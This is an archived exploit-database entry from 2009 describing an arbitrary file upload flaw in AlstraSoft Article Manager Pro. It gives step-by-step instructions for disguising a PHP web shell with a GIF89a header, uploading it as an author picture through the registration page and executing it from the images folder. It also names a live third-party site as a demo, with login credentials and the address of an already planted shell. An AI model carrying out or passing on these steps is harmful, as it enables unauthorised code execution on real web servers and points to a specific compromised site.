EXPLOITS

Alstrasoft Article Manager Pro - Arbitrary File Upload

Author: ZoRLu
type: webapps
platform: php
port: 
date_added: 2009-06-01  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8855.txt  

[~] AlstraSoft Article Manager Pro Remote Shell Upload Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Author: ZoRLu
[~]
[~] Date: 02.06.2009
[~]
[~] Home: yildirimordulari.com / z0rlu.blogspot.com
[~]
[~] msn: trt-turk@hotmail.com
[~]
[~] N0T: KPSS ananI ...
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------

add this code you shell head:

exapmle:

GIF89a;
<?

...
...
...

?>

save you shell.php

after go here:

yildirimordulari.com/article/register.php

after select your shell.php

done register after login to site edit your profile

and you look your shell name

yildirimordulari.com/article/images/author_pics/[id].php

example demo:

http://www.blizsoft.com/article/register.php

user: salla

pass: 123a123

shell:

http://www.blizsoft.com/article/images/author_pics/41.php


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & Stack & ThE g0bL!N & AlpHaNiX  and all friends
[~]
[~] yildirimordulari.com / dafgamers.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-06-02]